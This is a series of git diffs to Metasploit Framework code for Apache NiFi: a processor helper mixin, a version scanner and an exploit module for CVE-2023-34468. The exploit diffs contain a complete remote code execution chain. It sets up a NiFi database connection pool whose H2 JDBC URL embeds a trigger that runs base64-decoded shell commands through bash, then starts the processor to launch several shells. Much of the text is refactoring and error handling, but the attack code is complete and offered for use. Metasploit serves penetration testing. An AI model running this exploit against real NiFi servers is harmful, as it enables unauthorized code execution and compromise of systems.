@@ -44,8 +57,13 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    response = send_request_cgi(opts)
-    check_response("PUTting processor #{processor} stop command", response, 200)
+    res = send_request_cgi(opts)
+    raise ProcessorError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
 
     # Stop may not have worked (but must be done first). Terminate threads now
     opts = {
@@ -53,8 +71,14 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
       'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'threads')
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    response = send_request_cgi(opts)
-    check_response("DELETEing processor #{processor} terminate threads command", response, 200)
+    res = send_request_cgi(opts)
+    raise ProcessorError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+    print_good('Processor Start stop successfully')
   end
 
   # Delete a processor
@@ -63,23 +87,34 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
   # @param processor [String] UUID of the processes
   # @param version [Int] The version number to delete
   def delete_processor(token, processor, version = 0)
+    vprint_status("Attempting to delete version #{version} of Processor: #{processor}")
     opts = {
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor),
       'vars_get' => { 'version' => version }
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    response = send_request_cgi(opts)
+    res = send_request_cgi(opts)
     # if we tried to delete the old revision, go ahead and delete the newer one
     # arbitrary version limit of 20
-    while response.code == 400 && response.body.include?('is not the most up-to-date revision') && version <= 20
-      version += 1
+    while res.code == 400 && res.body.include?('is not the most up-to-date revision') && version <= 20
       vprint_status("Found newer revision of #{processor}, attempting to delete version #{version}")
       opts['vars_get'] = { 'version' => version }
-      response = send_request_cgi(opts)
+      delete_processor(token, processor, version += 1)
     end
 
-    check_response("DELETEting processor #{processor}", response, 200)
+    raise ProcessorError if res.nil?
+
+    if version == 20
+      print_bad("Aborting after attempting to delete 20 version of Processor: #{processor}")
+      raise ProcessorError
+    end
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+    print_good('Delete sent successfully')
   end
 
   # Creates a processor in a process group
@@ -89,6 +124,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
   # @param type [String] What type of processor to create
   # @return [String] The UUID of the root process group
   def create_processor(token, process_group, type = 'org.apache.nifi.processors.standard.ExecuteProcess')
+    vprint_status("Attempting to create of processor in group: #{process_group} of type #{type}")
     body = {
       'component' => { 'type' => type },
       'revision' => { 'version' => 0 }
@@ -100,8 +136,14 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    response = send_request_cgi(opts)
-    check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
+    res = send_request_cgi(opts)
+    return nil if res.nil?
+
+    unless res.code == 201
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+    res.get_json_document['id']
   end
 
   # Get a processor in a process group
@@ -110,13 +152,22 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
   # @param processor [String] UUID of a processoror
   # @param field [String] the key from the JSON blob to return
   # @return [String] THe value from the specified field
-  def get_processor(token, processor, field = 'id')
+  def get_processor_field(token, processor, field = 'id')
+    vprint_status("Attempting to get field #{field} of processor: #{processor}")
     opts = {
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor)
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-    response = send_request_cgi(opts)
-    check_response("GETting processor #{processor}", response, 200, field)
+    res = send_request_cgi(opts)
+
+    return nil if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+
+    res.get_json_document[field]
   end
 end

--- a/lib/msf/core/exploit/remote/http/nifi/processor.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/processor.rb
@@ -8,7 +8,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
 
   # Start processor
   #
-  # @param token [String] The bearer token from a valid login
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
   # @param processor [String] UUID of the processes
   def start_processor(token, processor)
     vprint_status("Attempting to start Processor: #{processor}")
@@ -39,7 +39,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
 
   # Stop processor
   #
-  # @param token [String] The bearer token from a valid login
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
   # @param processor [String] UUID of the processes
   def stop_processor(token, processor)
     vprint_status("Attempting to stop Processor: #{processor}")
@@ -83,7 +83,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
 
   # Delete a processor
   #
-  # @param token [String] The bearer token from a valid login
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
   # @param processor [String] UUID of the processes
   # @param version [Int] The version number to delete
   def delete_processor(token, processor, version = 0)
@@ -122,7 +122,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
 
   # Creates a processor in a process group
   #
-  # @param token [String] The bearer token from a valid login
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
   # @param process_group [String] UUID of a processor group
   # @param type [String] What type of processor to create
   # @return [String] The UUID of the root process group
@@ -151,7 +151,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Processor
 
   # Get a processor in a process group
   #
-  # @param token [String] The bearer token from a valid login
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
   # @param processor [String] UUID of a processoror
   # @param field [String] the key from the JSON blob to return
   # @return [String] THe value from the specified field

--- a/modules/auxiliary/scanner/http/apache_nifi_version.rb
+++ b/modules/auxiliary/scanner/http/apache_nifi_version.rb
@@ -32,7 +32,6 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
     )
-    deregister_options('USERNAME', 'PASSWORD', 'BEARER-TOKEN')
   end
 
   def run_host(ip)
@@ -41,8 +40,9 @@ class MetasploitModule < Msf::Auxiliary
 
     if version.nil?
       print_bad("Apache NiFi not detected on #{ip}")
-    else
-      print_good("Apache NiFi #{version} found on #{ip}")
+      return
     end
+
+    print_good("Apache NiFi #{version} found on #{ip}")
   end
 end

--- a/modules/auxiliary/scanner/http/apache_nifi_version.rb
+++ b/modules/auxiliary/scanner/http/apache_nifi_version.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HTTP::Nifi
 
   def initialize(info = {})
     super(
@@ -31,30 +32,17 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
     )
-    register_options(
-      [
-        Opt::RPORT(8443),
-        OptString.new('TARGETURI', [ true, 'The URI of the Apache NiFi Application', '/nifi/login'])
-      ]
-    )
-    register_advanced_options([
-      OptBool.new('SSL', [true, 'Negotiate SSL connection', true])
-    ])
+    deregister_options('USERNAME', 'PASSWORD', 'BEARER-TOKEN')
   end
 
   def run_host(ip)
     vprint_status("Checking #{ip}")
-    res = send_request_cgi!(
-      'uri' => normalize_uri(target_uri.path)
-    )
+    version = get_version
 
-    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
-    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 200
-
-    if res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]*)">}
-      print_good("Apache NiFi #{Regexp.last_match(1)} found on #{ip}")
-    else
+    if version.nil?
       print_bad("Apache NiFi not detected on #{ip}")
+    else
+      print_good("Apache NiFi #{version} found on #{ip}")
     end
   end
 end

--- a/modules/exploits/linux/http/apache_nifi_h2_rce.rb
+++ b/modules/exploits/linux/http/apache_nifi_h2_rce.rb
@@ -19,13 +19,9 @@ class MetasploitModule < Msf::Exploit::Remote
           The DBCPConnectionPool and HikariCPConnectionPool Controller Services in
           Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user
           to configure a Database URL with the H2 driver that enables custom code execution.
-          This exploit will create a new ExecuteSQL process, connect it to a DB Connection
-          Pool, and create a new H2 based connection.  The connection is able to create
-          a new memory based h2 database on the fly, with a code execution inlined that
-          executes when the H2 connection, and process are started.
 
           This exploit will result in several shells (5-7).
-          Successfully tested against Apache nifi 1.16.0 through 1.21.0.
+          Successfully tested against Apache nifi 1.17.0 through 1.21.0.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -60,47 +56,17 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
         }
       )
     )
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base path', '/']),
-        OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 15])
+        OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 30])
       ],
       self.class
     )
-  end
-
-  def create_dbconnectionpool
-    @db_con_pool_name = Rex::Text.rand_text_alphanumeric(6..10)
-    body = {
-      'revision' =>
-          {
-            'clientId' => 'x',
-            'version' => 0
-          },
-      'disconnectedNodeAcknowledged' => false,
-      'component' => {
-        'type' => 'org.apache.nifi.dbcp.DBCPConnectionPool',
-        'bundle' => {
-          'group' => 'org.apache.nifi',
-          'artifact' => 'nifi-dbcp-service-nar',
-          'version' => @version.to_s
-        },
-        'name' => @db_con_pool_name
-      }
-    }
-    opts = {
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', @process_group, 'controller-services'),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("POSTing processor #{@processor} configuration", response, 201, 'id')
   end
 
   def configure_dbconpool
@@ -111,11 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
       b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)
     end
 
-    if @version >= Rex::Version.new('1.23.0')
-      # 1.23.0, not exploitable though
-      driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.2.220.jar'
-    elsif @version > Rex::Version.new('1.16.0')
-      # 1.17.0-1.22.0, only up to 21 is exploitable
+    if @version > Rex::Version.new('1.16.0')
+      # 1.17.0-1.21.0
       driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.214.jar'
     else
       # 1.16.0
@@ -131,10 +94,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'comments' => '',
         'properties' => {
           # https://github.com/apache/nifi/pull/7349/files#diff-66ccc94a6b0dfa29817ded9c18e5a87c4fff9cd38eeedc3f121f6436ba53e6c0R38
-          # we can use a random db name here, the file is created automatically if we write to disk. However, we can be cleaner
-          # by using mem here instead of file
-          # $$ is used as the code start/stop block.
-          'Database Connection URL' => "jdbc:h2:mem:#{Rex::Text.rand_text_alpha_upper(6..12)};TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$",
+          # we can use a random db name here, the file is created automatically
+          # XXX would mem work too?
+          'Database Connection URL' => "jdbc:h2:file:/tmp/#{Rex::Text.rand_text_alphanumeric(6..10)}.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
           'Database Driver Class Name' => 'org.h2.Driver',
           # This seems to be installed by default, do we need the location?
           'database-driver-locations' => driver,
@@ -154,16 +116,18 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("PUTting db connection pool #{@processor} configuration", response, 200)
+    res = send_request_cgi(opts)
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code received #{res.code}") unless res.code == 200
   end
 
   def configure_processor
-    @processor_name = Rex::Text.rand_text_alphanumeric(6..10)
+    vprint_status("Configuring processor #{@processor}")
     body = {
+      # "disconnectedNodeAcknowledged"=> false,
       'component' => {
         'id' => @processor,
-        'name' => @processor_name,
+        'name' => Rex::Text.rand_text_alphanumeric(6..10),
         'bulletinLevel' => 'WARN',
         'comments' => '',
         'config' => {
@@ -196,8 +160,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("PUTting processor #{@processor_name} (#{@processor}) configuration", response, 200)
+    res = send_request_cgi(opts)
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code received #{res.code}") unless res.code == 200
   end
 
   def check
@@ -207,15 +172,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
     login_type = supports_login?
 
-    if !login_type
-      CheckCode::Unknown
-    elsif login_type
+    return CheckCode::Unknown('Unable to determine if logins are supported') if login_type.nil?
+
+    if login_type
       @version = get_version
+      return CheckCode::Unknown('Unable to determine Apache NiFi version') if @version.nil?
+
       if @version <= Rex::Version.new('1.21.0')
-        CheckCode::Detected("Apache NiFi instance supports logins and vulnerable version detected: #{@version}")
-      else
-        CheckCode::Safe("Apache NiFi instance supports logins but not non-vulnerable version detected: #{@version}")
+        return CheckCode::Detected("Apache NiFi instance supports logins and vulnerable version detected: #{@version}")
       end
+
+      CheckCode::Safe("Apache NiFi instance supports logins but not non-vulnerable version detected: #{@version}")
     else
       CheckCode::Appears('Apache NiFi instance does not support logins')
     end
@@ -229,6 +196,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def cleanup
     return unless @cleanup_required
+
+    super
 
     # Wait for thread to execute - This seems necesarry, especially on Windows
     # and there is no way I can see of checking whether the thread has executed
@@ -275,7 +244,8 @@ class MetasploitModule < Msf::Exploit::Remote
     @process_group = fetch_root_process_group(@token)
     vprint_good("Retrieved process group: #{@process_group}")
 
-    @db_con_pool = create_dbconnectionpool
+    @db_con_pool_name = Rex::Text.rand_text_alphanumeric(6..10)
+    @db_con_pool = create_dbconnectionpool(@token, @db_con_pool_name, @process_group, @version)
 
     @cleanup_required = true
 
@@ -286,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_good("Configured processor #{@processor}")
     configure_dbconpool
     vprint_good("Configured db connection pool #{@db_con_pool_name} (#{@db_con_pool})")
-    start_dbconpool(@token, @db_con_pool)
+    start_dbconnectionpool(@token, @db_con_pool)
     vprint_good('Enabling db connection pool')
     start_processor(@token, @processor)
     vprint_good('Starting processor')

--- a/modules/exploits/linux/http/apache_nifi_h2_rce.rb
+++ b/modules/exploits/linux/http/apache_nifi_h2_rce.rb
@@ -179,25 +179,25 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Unable to determine Apache NiFi version') if @version.nil?
 
       if @version <= Rex::Version.new('1.21.0')
-        return CheckCode::Detected("Apache NiFi instance supports logins and vulnerable version detected: #{@version}")
+        return CheckCode::Appears("Apache NiFi instance supports logins and vulnerable version detected: #{@version}")
       end
 
-      CheckCode::Safe("Apache NiFi instance supports logins but not non-vulnerable version detected: #{@version}")
+      CheckCode::Safe("Apache NiFi instance supports logins but non-vulnerable version detected: #{@version}")
     else
       CheckCode::Appears('Apache NiFi instance does not support logins')
     end
   end
 
   def validate_config
-    return if datastore['BEARER-TOKEN'].to_s.empty? || datastore['USERNAME'].to_s.empty?
-
-    fail_with(Failure::BadConfig, 'Specify EITHER Bearer-Token OR Username')
+    if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty?
+      fail_with(Failure::BadConfig,
+                'Authentication is required. Bearer-Token or Username and Password must be specified')
+    end
   end
 
   def cleanup
-    return unless @cleanup_required
-
     super
+    return unless @cleanup_required
 
     # Wait for thread to execute - This seems necesarry, especially on Windows
     # and there is no way I can see of checking whether the thread has executed
@@ -227,30 +227,26 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    validate_config
-
     # Check whether login is required and set/fetch token
     if supports_login?
-      if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty?
-        fail_with(Failure::BadConfig,
-                  'Authentication is required. Bearer-Token or Username and Password must be specified')
-      end
+      validate_config
       @token = if datastore['BEARER-TOKEN'].to_s.empty?
                  retrieve_login_token
                else
                  datastore['BEARER-TOKEN']
                end
+      fail_with(Failure::NoAccess, 'Invalid Credentials') if @token.nil?
     else
-      @token = false
+      @token = nil
     end
 
     if @version.nil?
       @version = get_version
     end
-    fail_with(Failure::NoAccess, 'Invalid Credentials') if @token.nil?
 
     # Retrieve root process group
     @process_group = fetch_root_process_group(@token)
+    fail_with(Failure::UnexpectedReply, 'Unable to retrieve root process group') if @process_group.nil?
     vprint_good("Retrieved process group: #{@process_group}")
 
     @db_con_pool_name = Rex::Text.rand_text_alphanumeric(6..10)

--- a/modules/exploits/linux/http/apache_nifi_h2_rce.rb
+++ b/modules/exploits/linux/http/apache_nifi_h2_rce.rb
@@ -19,19 +19,24 @@ class MetasploitModule < Msf::Exploit::Remote
           The DBCPConnectionPool and HikariCPConnectionPool Controller Services in
           Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user
           to configure a Database URL with the H2 driver that enables custom code execution.
+          This exploit will create a new ExecuteSQL process, connect it to a DB Connection
+          Pool, and create a new H2 based connection.  The connection is able to create
+          a new memory based h2 database on the fly, with a code execution inlined that
+          executes when the H2 connection, and process are started.
 
           This exploit will result in several shells (5-7).
-          Successfully tested against Apache nifi 1.20.0
+          Successfully tested against Apache nifi 1.16.0 through 1.21.0.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die', # msf module
-          'Matei "Mal" Badanoiu' # discovery, POC
+          'Matei "Mal" Badanoiu' # discovery
         ],
         'References' => [
           ['CVE', '2023-34468'],
           ['URL', 'https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8'],
           ['URL', 'https://issues.apache.org/jira/browse/NIFI-11653'],
+          ['URL', 'https://nifi.apache.org/security.html#1.22.0'],
           # not many h2 references on the Internet, especially for nifi, so leaving this here
           # ['URL', 'https://gist.github.com/ijokarumawak/ed9085024eeeefbca19cfb2f20d23ed4#file-table_record_change_detection_example-xml-L65']
           # ['URL', 'http://www.h2database.com/html/features.html']
@@ -61,53 +66,11 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The base path', '/nifi-api']),
-        OptString.new('DRIVER', [true, 'Location of the H2 driver', '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.214.jar']), # 1.20.0
-        OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 10])
+        OptString.new('TARGETURI', [true, 'The base path', '/']),
+        OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 15])
       ],
       self.class
     )
-  end
-
-  def disable_dbconnectionpool
-    body = {
-      'disconnectedNodeAcknowledged' => false,
-      'state' => 'DISABLED',
-      'uiOnly' => true,
-      'revision' => {
-        'clientId' => 'x',
-        'version' => 0
-      }
-    }
-    opts = {
-      'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'controller-services', @db_con_pool, 'run-status'),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("PUTting disable status for db connection pool #{@db_con_pool}", response, 200)
-  end
-
-  def delete_dbconnectionpool
-    version = 0
-    opts = {
-      'method' => 'DELETE',
-      'uri' => normalize_uri(target_uri.path, 'controller-services', @db_con_pool),
-      'vars_get' => {
-        'version' => version
-      }
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    while response.code == 400 && response.body.include?('is not the most up-to-date revision') && version <= 20
-      version += 1
-      vprint_status("Found newer revision of #{@db_con_pool}, attempting to delete version #{version}")
-      opts['vars_get'] = { 'version' => version }
-      response = send_request_cgi(opts)
-    end
-    check_response("DELETing db connection pool #{@processor}", response, 200)
   end
 
   def create_dbconnectionpool
@@ -124,15 +87,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'bundle' => {
           'group' => 'org.apache.nifi',
           'artifact' => 'nifi-dbcp-service-nar',
-          # XXX this needs to be updated to the version we find
-          'version' => '1.20.0'
+          'version' => @version.to_s
         },
         'name' => @db_con_pool_name
       }
     }
     opts = {
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'process-groups', @process_group, 'controller-services'),
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', @process_group, 'controller-services'),
       'ctype' => 'application/json',
       'data' => body.to_json
     }
@@ -141,52 +103,23 @@ class MetasploitModule < Msf::Exploit::Remote
     check_response("POSTing processor #{@processor} configuration", response, 201, 'id')
   end
 
-  def enable_dbconpool
-    body = {
-      'disconnectedNodeAcknowledged' => false,
-      'state' => 'ENABLED',
-      'uiOnly' => true,
-      'revision' => {
-        'clientId' => 'x',
-        'version' => 0
-      }
-    }
-    opts = {
-      'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'controller-services', @db_con_pool, 'run-status'),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("PUTting start status for db connection pool #{@db_con_pool}", response, 200)
-  end
-
-  def start_processor
-    body = {
-      'state' => 'RUNNING', 'disconnectedNodeAcknowledged' => false,
-      'revision' => {
-        'clientId' => 'x',
-        'version' => 0
-      }
-    }
-    opts = {
-      'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'run-status'),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("PUTting processor #{@processor} configuration", response, 200)
-  end
-
   def configure_dbconpool
     # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them
     b64_pe = ::Base64.strict_encode64(payload.encoded)
     equals_count = b64_pe.count('=')
     if equals_count > 0
       b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)
+    end
+
+    if @version >= Rex::Version.new('1.23.0')
+      # 1.23.0, not exploitable though
+      driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.2.220.jar'
+    elsif @version > Rex::Version.new('1.16.0')
+      # 1.17.0-1.22.0, only up to 21 is exploitable
+      driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.214.jar'
+    else
+      # 1.16.0
+      driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.210.jar'
     end
 
     body = {
@@ -198,12 +131,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'comments' => '',
         'properties' => {
           # https://github.com/apache/nifi/pull/7349/files#diff-66ccc94a6b0dfa29817ded9c18e5a87c4fff9cd38eeedc3f121f6436ba53e6c0R38
-          # we can use a random db name here, the file is created automatically
-          # XXX would mem work too?
-          'Database Connection URL' => "jdbc:h2:file:/tmp/#{Rex::Text.rand_text_alphanumeric(6..10)}.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
+          # we can use a random db name here, the file is created automatically if we write to disk. However, we can be more clean
+          # by using mem here instead of file
+          'Database Connection URL' => "jdbc:h2:mem:#{Rex::Text.rand_text_alpha_upper(6..12)};TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
           'Database Driver Class Name' => 'org.h2.Driver',
           # This seems to be installed by default, do we need the location?
-          'database-driver-locations' => '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.214.jar', # 1.20.0 and 1.21.0, this is a required field to get the controller to start
+          'database-driver-locations' => driver,
           "Max Total Connections": '1' # prevents us from getting multiple callbacks
         },
         'sensitiveDynamicPropertyNames' => []
@@ -215,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     opts = {
       'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'controller-services', @db_con_pool),
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', @db_con_pool),
       'ctype' => 'application/json',
       'data' => body.to_json
     }
@@ -225,11 +158,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def configure_processor
+    @processor_name = Rex::Text.rand_text_alphanumeric(6..10)
     body = {
-      # "disconnectedNodeAcknowledged"=> false,
       'component' => {
         'id' => @processor,
-        'name' => Rex::Text.rand_text_alphanumeric(6..10),
+        'name' => @processor_name,
         'bulletinLevel' => 'WARN',
         'comments' => '',
         'config' => {
@@ -252,18 +185,18 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'revision' => {
         'clientId' => 'x',
-        'version' => 1
+        'version' => 1 # needs to be 1 since we had 0 before
       }
     }
     opts = {
       'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'processors', @processor),
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', @processor),
       'ctype' => 'application/json',
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
-    check_response("PUTting processor #{@processor} configuration", response, 200)
+    check_response("PUTting processor #{@processor_name} (#{@processor}) configuration", response, 200)
   end
 
   def check
@@ -271,18 +204,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @cleanup_required = false
 
-    response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'access', 'config') })
-    if !response
+    login_type = supports_login?
+
+    if !login_type
       CheckCode::Unknown
-    else
-      body = response.get_json_document
-      if !body.key?('config')
-        CheckCode::Safe
-      elsif body['config']['supportsLogin']
-        CheckCode::Detected
+    elsif login_type
+      @version = get_version
+      if @version <= Rex::Version.new('1.21.0')
+        CheckCode::Detected("Apache NiFi instance supports logins and vulnerable version detected: #{@version}")
       else
-        CheckCode::Appears
+        CheckCode::Safe("Apache NiFi instance supports logins but not non-vulnerable version detected: #{@version}")
       end
+    else
+      CheckCode::Appears('Apache NiFi instance does not support logins')
     end
   end
 
@@ -307,10 +241,10 @@ class MetasploitModule < Msf::Exploit::Remote
     # Delete processor
     delete_processor(@token, @processor, 3)
     vprint_good("Deleted processor #{@processor}")
-    disable_dbconnectionpool
+    stop_dbconnectionpool(@token, @db_con_pool)
     vprint_good("Disabled db connection pool #{@db_con_pool}, sleeping #{datastore['DELAY']} seconds to allow the connection to finish disabling")
     sleep(datastore['DELAY'])
-    delete_dbconnectionpool
+    delete_dbconnectionpool(@token, @db_con_pool)
     vprint_good("Deleted db connection pool #{@db_con_pool}")
   end
 
@@ -318,7 +252,7 @@ class MetasploitModule < Msf::Exploit::Remote
     validate_config
 
     # Check whether login is required and set/fetch token
-    if supports_login
+    if supports_login?
       if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty?
         fail_with(Failure::BadConfig,
                   'Authentication is required. Bearer-Token or Username and Password must be specified')
@@ -330,6 +264,10 @@ class MetasploitModule < Msf::Exploit::Remote
                end
     else
       @token = false
+    end
+
+    if @version.nil?
+      @version = get_version
     end
 
     # Retrieve root process group
@@ -347,9 +285,9 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_good("Configured processor #{@processor}")
     configure_dbconpool
     vprint_good("Configured db connection pool #{@db_con_pool_name} (#{@db_con_pool})")
-    enable_dbconpool
+    start_dbconpool(@token, @db_con_pool)
     vprint_good('Enabling db connection pool')
-    start_processor
+    start_processor(@token, @processor)
     vprint_good('Starting processor')
   end
 end

--- a/modules/exploits/linux/http/apache_nifi_h2_rce.rb
+++ b/modules/exploits/linux/http/apache_nifi_h2_rce.rb
@@ -1,0 +1,355 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Nifi
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache NiFi H2 Connection String Remote Code Execution',
+        'Description' => %q{
+          The DBCPConnectionPool and HikariCPConnectionPool Controller Services in
+          Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user
+          to configure a Database URL with the H2 driver that enables custom code execution.
+
